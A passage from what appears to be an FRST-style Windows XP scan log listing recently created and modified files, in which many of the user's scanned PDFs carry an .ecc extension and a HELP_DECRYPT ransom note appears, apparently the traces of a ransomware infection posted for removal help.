14:58 - 00000288 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL 2015-02-25 13:57 - 2015-02-26 08:23 - 66112650 _____ () C:\Documents and Settings\Maureen\Application Data\log.html 2015-02-25 13:57 - 2015-02-25 13:57 - 00000636 _____ () C:\Documents and Settings\Maureen\Application Data\key.dat 2015-02-25 13:37 - 2015-02-25 13:37 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Macromedia 2015-02-25 13:13 - 2015-03-07 18:56 - 00000000 ___HD () C:\Documents and Settings\All Users\Application Data\{72CDD0F3-C5DC-44BD-9A3E-9B7A11C6D8F9} ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2015-03-07 18:57 - 2013-07-07 13:45 - 00000159 _____ () C:\WINDOWS\wiadebug.log 2015-03-07 18:57 - 2013-07-07 13:45 - 00000048 _____ () C:\WINDOWS\wiaservc.log 2015-03-07 18:57 - 2008-04-13 18:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl 2015-03-07 18:56 - 2014-12-29 12:24 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job 2015-03-07 18:56 - 2014-03-30 13:51 - 00000226 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job 2015-03-07 18:56 - 2013-07-07 17:53 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT 2015-03-07 18:55 - 2014-12-08 08:44 - 00589824 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt 2015-03-07 18:55 - 2014-04-14 16:40 - 01048576 _____ () C:\WINDOWS\system32\config\iolo App.evt 2015-03-07 18:55 - 2013-07-07 17:53 - 00032570 _____ () C:\WINDOWS\SchedLgU.Txt 2015-03-07 18:55 - 2013-07-07 17:53 - 00000178 ___SH () C:\Documents and Settings\Maureen\ntuser.ini 2015-03-07 18:51 - 2013-07-07 17:53 - 00000000 __SHD () C:\Documents and Settings\LocalService 2015-03-07 18:41 - 2008-04-13 18:00 - 00000227 _____ () C:\WINDOWS\system.ini 2015-03-07 17:34 - 2014-12-29 12:24 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job 2015-03-07 17:29 - 2013-07-07 17:50 - 00000000 ____D () C:\DELL 2015-03-07 16:36 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At3.job 2015-03-07 14:30 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At4.job 2015-03-07 10:15 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job 2015-03-07 05:11 - 2014-12-05 12:29 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat 2015-03-07 03:44 - 2014-12-29 08:53 - 00035992 _____ () C:\WINDOWS\system32\Drivers\hitmanpro37.sys 2015-03-07 03:42 - 2014-07-05 12:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\HitmanPro 2015-03-06 20:45 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At2.job 2015-03-06 19:47 - 2014-04-14 16:40 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\iolo 2015-03-06 19:41 - 2013-07-07 13:41 - 00000327 ___SH () C:\boot.ini 2015-03-06 19:41 - 2008-04-13 18:00 - 00000931 _____ () C:\WINDOWS\win.ini 2015-03-06 19:23 - 2013-11-26 14:37 - 00000000 ____D () C:\WINDOWS\Minidump 2015-03-06 00:03 - 2013-07-07 13:37 - 00000000 ____D () C:\WINDOWS\security 2015-03-05 22:52 - 2013-07-07 17:53 - 00000000 __SHD () C:\Documents and Settings\NetworkService 2015-03-05 22:19 - 2013-07-07 17:48 - 00000000 ____D () C:\WINDOWS\system32\Restore 2015-03-05 22:17 - 2013-07-07 13:42 - 00262144 _____ () C:\WINDOWS\system32\config\SECURITY.bak 2015-03-05 22:17 - 2013-07-07 13:42 - 00028672 _____ () C:\WINDOWS\system32\config\SAM.bak 2015-03-05 22:17 - 2013-07-07 13:41 - 28049408 _____ () C:\WINDOWS\system32\config\software.bak 2015-03-05 22:17 - 2013-07-07 13:41 - 10747904 _____ () C:\WINDOWS\system32\config\system.bak 2015-03-05 22:17 - 2013-07-07 13:41 - 00667648 _____ () C:\WINDOWS\system32\config\default.bak 2015-03-05 18:36 - 2014-12-06 13:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\YuveHogu 2015-03-05 08:38 - 2014-12-29 12:25 - 00001813 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk 2015-03-01 22:15 - 2013-07-07 19:22 - 00000000 ____D () C:\Shop Shared 2015-03-01 21:43 - 2013-07-07 18:11 - 00000000 ____D () C:\Shared Files 2015-02-27 09:51 - 2014-04-15 10:03 - 00000000 ____D () C:\WINDOWS\system32\config\SM Registry Backup 2015-02-27 08:27 - 2014-04-14 16:40 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\iolo 2015-02-26 18:09 - 2013-07-07 19:26 - 00000000 ____D () C:\Documents and Settings\Maureen\email 2015-02-26 15:59 - 2013-11-10 17:18 - 00000000 ____D () C:\Logitech Alert Recordings 2015-02-26 15:02 - 2013-07-07 18:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage 2015-02-26 14:34 - 2014-04-14 16:55 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\System Mechanic Professional 2015-02-26 14:33 - 2013-07-07 13:37 - 00000000 ____D () C:\WINDOWS\Media 2015-02-26 08:15 - 2013-07-10 14:26 - 00000000 ____D () C:\Program Files\Quantum Project Manager 2015-02-26 08:15 - 2013-07-07 17:48 - 00000000 ____D () C:\Program Files\Outlook Express 2015-02-26 08:14 - 2013-07-10 14:46 - 00000000 ____D () C:\Program Files\Microsoft Works 2015-02-26 07:53 - 2014-07-26 07:30 - 00000000 ____D () C:\Documents and Settings\Maureen\My Documents\Old house Web 2015-02-26 07:53 - 2014-02-10 13:41 - 00034516 _____ () C:\Documents and Settings\Maureen\My Documents\Warwick Zoning-2nd Notice of Violation 2-2014.pdf.ecc 2015-02-26 07:51 - 2014-08-20 11:31 - 00064740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140820123125.pdf.ecc 2015-02-26 07:51 - 2014-08-19 10:48 - 00047988 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819114815.pdf.ecc 2015-02-26 07:51 - 2014-08-19 08:42 - 00027124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819094206.pdf.ecc 2015-02-26 07:51 - 2014-08-19 06:20 - 00004852 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819072017.pdf.ecc 2015-02-26 07:51 - 2014-08-15 13:26 - 00074516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140815142604.pdf.ecc 2015-02-26 07:51 - 2014-08-14 11:05 - 00142228 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140814120545.pdf.ecc 2015-02-26 07:51 - 2014-08-13 14:40 - 00034052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140813154055.pdf.ecc 2015-02-26 07:51 - 2014-08-07 10:46 - 00065732 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140807114653.pdf.ecc 2015-02-26 07:51 - 2014-08-05 09:33 - 00065796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140805103338.pdf.ecc 2015-02-26 07:51 - 2014-08-01 12:42 - 00088740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801134257.pdf.ecc 2015-02-26 07:51 - 2014-08-01 08:01 - 00030612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801090112.pdf.ecc 2015-02-26 07:51 - 2014-08-01 07:59 - 00023748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801085953.pdf.ecc 2015-02-26 07:51 - 2014-07-22 08:58 - 00031972 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140722095858.pdf.ecc 2015-02-26 07:51 - 2014-07-21 10:05 - 00036980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140721110504.pdf.ecc 2015-02-26 07:51 - 2014-07-18 13:03 - 00031348 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718140346.pdf.ecc 2015-02-26 07:51 - 2014-07-18 12:46 - 00031956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718134619.pdf.ecc 2015-02-26 07:51 - 2014-07-18 07:32 - 00022980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718083214.pdf.ecc 2015-02-26 07:51 - 2014-07-17 14:32 - 00050420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140717153259.pdf.ecc 2015-02-26 07:51 - 2014-07-14 11:48 - 00012036 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140714124837.pdf.ecc 2015-02-26 07:51 - 2014-07-14 10:28 - 00094308 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140714112815.pdf.ecc 2015-02-26 07:51 - 2014-07-10 11:00 - 00029956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140710120056.pdf.ecc 2015-02-26 07:51 - 2014-07-10 09:25 - 00053956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140710102549.pdf.ecc 2015-02-26 07:51 - 2014-07-02 10:36 - 00126628 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140702113611.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:36 - 00182516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701093646.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:31 - 00312612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701093103.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:27 - 00185444 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092734.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:24 - 00095684 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092447.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:22 - 00104692 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092237.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:19 - 00061796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091949.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:15 - 00140484 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091538.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:14 - 00217268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091408.pdf.ecc 2015-02-26 07:51 - 2014-07-01 08:10 - 00288756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091046.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:56 - 00140644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701085631.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:51 - 00152980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701085144.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:47 - 00149540 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701084720.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:39 - 00114644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083926.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:33 - 00047716 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083308.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:31 - 00055748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083139.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:30 - 00066420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083001.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:27 - 00094484 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082734.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:24 - 00076708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082451.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:22 - 00076244 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082255.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:21 - 00024868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082149.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:20 - 00077924 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082003.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:18 - 00100740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081823.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:16 - 00096948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081629.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:15 - 00042148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081505.pdf.ecc 2015-02-26 07:51 - 2014-07-01 07:13 - 00060804 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081318.pdf.ecc 2015-02-26 07:51 - 2014-06-26 09:58 - 00217604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140626105851.pdf.ecc 2015-02-26 07:51 - 2014-06-21 07:21 - 00349268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621082052_1.jpg.ecc 2015-02-26 07:51 - 2014-06-21 07:18 - 00123620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621081824.pdf.ecc 2015-02-26 07:51 - 2014-06-21 07:17 - 00132100 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621081709.pdf.ecc 2015-02-26 07:51 - 2014-06-16 09:27 - 00051876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140616102702.pdf.ecc 2015-02-26 07:51 - 2014-06-13 07:58 - 00068196 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140613085834.pdf.ecc 2015-02-26 07:51 - 2014-06-12 10:08 - 00235092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612110825.pdf.ecc 2015-02-26 07:51 - 2014-06-12 10:06 - 00180980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612110631.pdf.ecc 2015-02-26 07:51 - 2014-06-12 09:54 - 00074900 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612105432.pdf.ecc 2015-02-26 07:51 - 2014-06-10 11:16 - 00086980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140610121658.pdf.ecc 2015-02-26 07:51 - 2014-06-10 11:00 - 00087316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140610120022.pdf.ecc 2015-02-26 07:51 - 2014-06-09 12:07 - 00020836 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140609130750.pdf.ecc 2015-02-26 07:51 - 2014-06-04 07:39 - 00034420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140604083945.pdf.ecc 2015-02-26 07:51 - 2014-05-21 14:55 - 00269332 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521155518.pdf.ecc 2015-02-26 07:51 - 2014-05-21 14:41 - 00219876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521154149.pdf.ecc 2015-02-26 07:51 - 2014-05-21 14:40 - 00048644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521154024.pdf.ecc 2015-02-26 07:51 - 2014-05-21 14:38 - 00117652 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521153851.pdf.ecc 2015-02-26 07:51 - 2014-05-20 12:44 - 00074388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140520134451.pdf.ecc 2015-02-26 07:51 - 2014-05-12 10:37 - 00065716 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140512113735.pdf.ecc 2015-02-26 07:51 - 2014-05-12 10:36 - 00087844 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140512113639.pdf.ecc 2015-02-26 07:51 - 2014-05-09 09:06 - 00086708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140509100620.pdf.ecc 2015-02-26 07:51 - 2014-05-02 11:15 - 00005652 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140502121504.pdf.ecc 2015-02-26 07:51 - 2014-04-23 07:41 - 00023172 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140423084132.pdf.ecc 2015-02-26 07:51 - 2014-04-22 12:35 - 00054644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140422133522.pdf.ecc 2015-02-26 07:51 - 2014-04-17 12:04 - 00062212 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140417130433.pdf.ecc 2015-02-26 07:51 - 2014-04-17 10:34 - 00034404 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140417113412.pdf.ecc 2015-02-26 07:51 - 2014-04-14 11:26 - 00138708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140414122608.pdf.ecc 2015-02-26 07:51 - 2014-04-11 12:52 - 00014548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140411135214.pdf.ecc 2015-02-26 07:51 - 2014-04-10 08:01 - 00067412 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140410090127.pdf.ecc 2015-02-26 07:51 - 2014-04-08 14:24 - 00033060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140408152429.pdf.ecc 2015-02-26 07:51 - 2014-04-07 07:55 - 00039220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140407085512.pdf.ecc 2015-02-26 07:51 - 2014-04-03 11:10 - 00132868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140403121031.pdf.ecc 2015-02-26 07:51 - 2014-04-03 09:10 - 00064180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140403101014.pdf.ecc 2015-02-26 07:51 - 2014-04-02 15:57 - 00188516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140402165733.pdf.ecc 2015-02-26 07:51 - 2014-04-01 09:46 - 00011268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140401104645.pdf.ecc 2015-02-26 07:51 - 2014-03-31 12:43 - 00047220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140331134318.pdf.ecc 2015-02-26 07:51 - 2014-03-28 11:29 - 00007828 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328122924.pdf.ecc 2015-02-26 07:51 - 2014-03-28 11:22 - 00039092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328122240.pdf.ecc 2015-02-26 07:51 - 2014-03-28 10:58 - 00084420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328115814.pdf.ecc 2015-02-26 07:51 - 2014-03-17 12:48 - 00062052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140317134833.pdf.ecc 2015-02-26 07:51 - 2014-03-17 07:52 - 00047188 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140317085237.pdf.ecc 2015-02-26 07:51 - 2014-03-06 10:11 - 00019220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140306101156.pdf.ecc 2015-02-26 07:51 - 2014-03-06 10:09 - 00060804 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140306100940.pdf.ecc 2015-02-26 07:51 - 2014-02-26 10:28 - 00025588 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140226102803.pdf.ecc 2015-02-26 07:51 - 2014-02-26 10:24 - 00024340 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140226102440.pdf.ecc 2015-02-26 07:51 - 2014-02-25 08:35 - 00160724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140225083520.pdf.ecc 2015-02-26 07:51 - 2014-02-24 13:43 - 00026388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140224134349.pdf.ecc 2015-02-26 07:51 - 2014-02-23 09:38 - 00057796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140223093820.pdf.ecc 2015-02-26 07:51 - 2014-02-20 09:34 - 00106532 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140220093401.pdf.ecc 2015-02-26 07:51 - 2014-02-20 08:55 - 00177748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140220085507.pdf.ecc 2015-02-26 07:51 - 2014-02-14 10:59 - 00015060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105952.pdf.ecc 2015-02-26 07:51 - 2014-02-14 10:57 - 00013780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105732.pdf.ecc 2015-02-26 07:51 - 2014-02-14 10:56 - 00012852 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105618.pdf.ecc 2015-02-26 07:51 - 2014-02-10 15:48 - 00018564 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154813.pdf.ecc 2015-02-26 07:51 - 2014-02-10 15:44 - 00085620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154430.pdf.ecc 2015-02-26 07:51 - 2014-02-10 15:40 - 00037572 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154045.pdf.ecc 2015-02-26 07:51 - 2014-02-10 13:55 - 00032164 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210135519.pdf.ecc 2015-02-26 07:51 - 2014-02-10 13:38 - 00030244 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210133824.pdf.ecc 2015-02-26 07:51 - 2014-02-05 15:03 - 00009028 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140205150354.pdf.ecc 2015-02-26 07:51 - 2014-01-29 09:41 - 00112324 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140129094138.pdf.ecc 2015-02-26 07:51 - 2014-01-29 09:40 - 00083124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140129094001.pdf.ecc 2015-02-26 07:51 - 2014-01-22 12:53 - 00091524 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122125316.pdf.ecc 2015-02-26 07:51 - 2014-01-22 12:50 - 00085764 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122125028.pdf.ecc 2015-02-26 07:51 - 2014-01-22 12:45 - 00089924 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122124539.pdf.ecc 2015-02-26 07:51 - 2014-01-20 16:50 - 00066932 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120165006.pdf.ecc 2015-02-26 07:51 - 2014-01-20 16:04 - 00075508 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120160445.pdf.ecc 2015-02-26 07:51 - 2014-01-20 14:43 - 00066388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120144356.pdf.ecc 2015-02-26 07:51 - 2014-01-20 09:23 - 00082420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120092332.pdf.ecc 2015-02-26 07:51 - 2014-01-08 17:01 - 00057316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140108170158.pdf.ecc 2015-02-26 07:51 - 2014-01-08 09:04 - 00019700 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140108090459.pdf.ecc 2015-02-26 07:51 - 2014-01-07 13:12 - 00005220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140107131224.pdf.ecc 2015-02-26 07:51 - 2014-01-06 16:30 - 00020660 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140106163029.pdf.ecc 2015-02-26 07:51 - 2013-12-27 14:57 - 00190612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131227145734.pdf.ecc 2015-02-26 07:51 - 2013-12-20 09:27 - 00065828 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131220092757.pdf.ecc 2015-02-26 07:51 - 2013-12-20 09:24 - 00062148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131220092448.pdf.ecc 2015-02-26 07:51 - 2013-12-19 12:01 - 00012836 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131219120141.pdf.ecc 2015-02-26 07:51 - 2013-12-16 16:02 - 00076180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131216160247.pdf.ecc 2015-02-26 07:51 - 2013-12-16 16:01 - 00032980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131216160117.pdf.ecc 2015-02-26 07:51 - 2013-12-13 15:40 - 00074132 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131213154009.pdf.ecc 2015-02-26 07:51 - 2013-12-10 07:52 - 00009044 _____ () C:\Documents and Settings\Maureen\My Documents\Emidy.pdf.ecc 2015-02-26 07:51 - 2013-12-10 07:50 - 00004772 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131210075017.pdf.ecc 2015-02-26 07:51 - 2013-12-05 14:36 - 00054020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131205143616.pdf.ecc 2015-02-26 07:51 - 2013-12-04 15:36 - 00101124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131204153656.pdf.ecc 2015-02-26 07:51 - 2013-12-02 12:19 - 00099780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131202121943.pdf.ecc 2015-02-26 07:51 - 2013-11-29 15:42 - 00136948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131129154246.pdf.ecc 2015-02-26 07:51 - 2013-11-26 12:14 - 00109156 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126121406.pdf.ecc 2015-02-26 07:51 - 2013-11-26 12:11 - 00134292 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126121130.pdf.ecc 2015-02-26 07:51 - 2013-11-26 08:42 - 00081956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126084257.pdf.ecc 2015-02-26 07:51 - 2013-11-21 15:52 - 00198948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131121155223.pdf.ecc 2015-02-26 07:51 - 2013-11-13 10:55 - 00010964 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131113105547.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:42 - 00086596 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112154214.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:40 - 00094260 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112154007.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:32 - 00049236 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112153234.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:30 - 00098148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112153050.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:28 - 00094980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152849.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:27 - 00094692 _____ () C:\Documents and 